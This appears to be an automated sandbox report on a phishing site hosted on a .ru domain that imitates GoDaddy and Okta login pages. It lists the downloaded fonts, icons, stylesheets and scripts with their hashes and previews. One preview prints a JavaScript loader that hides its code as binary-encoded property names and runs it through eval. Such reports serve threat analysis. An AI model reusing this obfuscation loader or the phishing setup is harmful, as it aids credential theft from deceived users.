                                                                  SSDEEP:384:EwTZQ74B48VtrMvbt0sAvPTMaf+j5s8OYbqarRbjy5Qg1AR/kf63z/:hTa4B4mtYztAvPTMFhOYb3Rbu571AJa6
                                                                  MD5:4B52ECDC33382C9DCA874F551990E704
                                                                  SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                  SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                  SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/stLx2AXVud2xlUwbPNljeDAzdhl4A2IPUOzzCg0S5LGrFzfplmnd34wtauD5gunMCnt6yZAef259
                                                                  Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):1864
                                                                  Entropy (8bit):5.222032823730197
                                                                  Encrypted:false
                                                                  SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/kl9Cb6f7Uuv8fQEwD093oOMERlzX9OD3Ac3VPlY56wuFWGKQ35uHV6xBNjuv220
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):268
                                                                  Entropy (8bit):5.111190711619041
                                                                  Encrypted:false
                                                                  SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                  MD5:59759B80E24A89C8CD029B14700E646D
                                                                  SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                  SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                  SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/rsvIvTvoLMZ03pS3MwX9LijbSo1tmpSLY8DjCu6chApJIUMh9R9qpcd198
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (10450)
                                                                  Category:downloaded
                                                                  Size (bytes):10498
                                                                  Entropy (8bit):5.327380141461276
                                                                  Encrypted:false
                                                                  SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                                  MD5:E0D37A504604EF874BAD26435D62011F
                                                                  SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                  SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                  SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                  Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):128
                                                                  Entropy (8bit):4.750616928608237
                                                                  Encrypted:false
                                                                  SSDEEP:3:CaSbcCq9EKVEkxhZJSh3EkEkkcJSh3EkEkki3kx+BR0:PSbzqyKVEkxzQ7QDw+R0
                                                                  MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                  SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                  SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                  SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCUEHp6WPoA4yEgUNX1f-DRIFDRObJGMhF2ZGVJi2nTMSSgljomvUcLwL6BIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IQO_Cy-7UjuX?alt=proto
                                                                  Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):35786
                                                                  Entropy (8bit):5.058073854893359
                                                                  Encrypted:false
                                                                  SSDEEP:192:hToogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkf1WcrScuH9Ye3YdersR8Q5oqWjfuogF:h0DKAaZtJsOodwuhx5P6mqjDggJkLRn
                                                                  MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                  SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                  SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                  SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/abvf9t8pq9ef30
                                                                  Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                  Category:downloaded
                                                                  Size (bytes):28584
                                                                  Entropy (8bit):7.992563951996154
                                                                  Encrypted:true
                                                                  SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                                  MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                  SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                  SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                  SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/GDSherpa-regular.woff2
                                                                  Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):270
                                                                  Entropy (8bit):4.840496990713235
                                                                  Encrypted:false
                                                                  SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                  MD5:40EB39126300B56BF66C20EE75B54093
                                                                  SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                  SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                  SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/efAlkLzZXEwNsgINX7w1qxrgFMBnoYa5WVYJijrAmeuDXpDcVRZAjYpFJOZ90150
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):1298
                                                                  Entropy (8bit):6.665390877423149
                                                                  Encrypted:false
                                                                  SSDEEP:24:L+aPlKKVkz1f+tPUgo/KQGbEZAu6hZjJ+uvRGumDyqCuiRFqB6dhQiZmh7:L+ElbQ1f+Bo/LfAuk4uvR5mDymiRFqBN
                                                                  MD5:32CA2081553E969F9FDD4374134521AD
                                                                  SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                  SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                  SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/ijKWEY7gRXQm1JNCLSnYvcXyv9pGf253dTVw89gLm7vwI92mhs7QBmbAm2yz230
                                                                  Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):4712061
                                                                  Entropy (8bit):2.583772531747173
                                                                  Encrypted:false
                                                                  SSDEEP:6144:LyhjM/9KIpSIiDhDoZghdXRKDBhIJIshSDbX+ov3bIwJDDBstdDhdDfCIgDhgRKb:D
                                                                  MD5:E34A613844E71AD9EA25A2FAAB768F3F
                                                                  SHA1:34844596642BED7752C4AED44721CEE52593B344
                                                                  SHA-256:D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
                                                                  SHA-512:8D5342EC77557793F73701400220B10421E6B1ED941876554D27F27A0573644F26C66FA4AB7019E666F6471688E2F7857394CC127197EF109FC076BC5534342C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/34xdLZylu9sNLs7eTij0Uqz9prscZpLQu67104
                                                                  Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48122)
                                                                  Category:downloaded
                                                                  Size (bytes):48123
                                                                  Entropy (8bit):5.342776422127859
                                                                  Encrypted:false
                                                                  SSDEEP:768:gCbPzVMta23aGa0rn5iWqS2kdX+iGwS3EjtCsCXY2iIEjkNY1LBep7iFFQ7XIrva:Ita2qGa0rn5Rq05GE2i9k7
                                                                  MD5:D28852417B2F548B9D22157F3059676B
                                                                  SHA1:186A3E17CDB58CF409574285BB587060BD798361
                                                                  SHA-256:538B4166B164FABBE579B771EB697E6E89F40CCE3AB16479A7A057083D943310
                                                                  SHA-512:C2550C5535F2B7423A9E4549F027754795C1F9D67668429B82239D51A0E72BBE5A847730BFD7704C36E9A97DC91B2F6466640B71573198497CCB495F60BB84E5
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/c8ec7565fab7/api.js
                                                                  Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:downloaded
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):7390
                                                                  Entropy (8bit):4.02755241095864
                                                                  Encrypted:false
                                                                  SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                  MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                  SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                  SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                  SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/ijh3pCKtx2MXEuj3T1idod88SGEmvyzP0ZxllXfeCSfXEG7N78170
                                                                  Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (886)
                                                                  Category:downloaded
                                                                  Size (bytes):891
                                                                  Entropy (8bit):5.186090406163115
                                                                  Encrypted:false
                                                                  SSDEEP:24:/As/+IW4UU6Rfi3GjeBHslgT1d1uawBATYuoBN2t2t2t2t2t2t2tomffffffo:/As/+eUU6RfyVKlgJXwBAMuSNYYYYYYb
                                                                  MD5:0D3198453B8C26F917A798C8DEAA4C0B
                                                                  SHA1:098F6E21F15363A86B8EDECE7A19DB17D1E7FD6F
                                                                  SHA-256:BB14DFA6DC84DE4724699E52B848123030F185D2D0E41DE60E42317E568F3259
                                                                  SHA-512:B902C2FCD44C49214373BC12B42687DC5D5C0F56E6E9951E9E16487A1A060149050B7388FF584B735B9E8387717D862E9AC34C26F2F4F7BC75DF07218F674A49
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                  Preview:)]}'.["",["cookie run wedding cake cookie toppings","college football 26 cover","weather storms and tornadoes","edward user layoffs st louis","avowed update patch notes","crossfit open 25.3 workouts","unclaimed tax refunds irs","new york yankees rumors"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"4106021397327906442","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                  Category:downloaded
                                                                  Size (bytes):28000
                                                                  Entropy (8bit):7.99335735457429
                                                                  Encrypted:true
                                                                  SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                                  MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                  SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                  SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                  SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/GDSherpa-bold.woff2
                                                                  Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):35970
                                                                  Entropy (8bit):7.989503040923577
                                                                  Encrypted:false
                                                                  SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                  MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                  SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                  SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                  SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                  Malicious:false
                                                                  Reputation:low
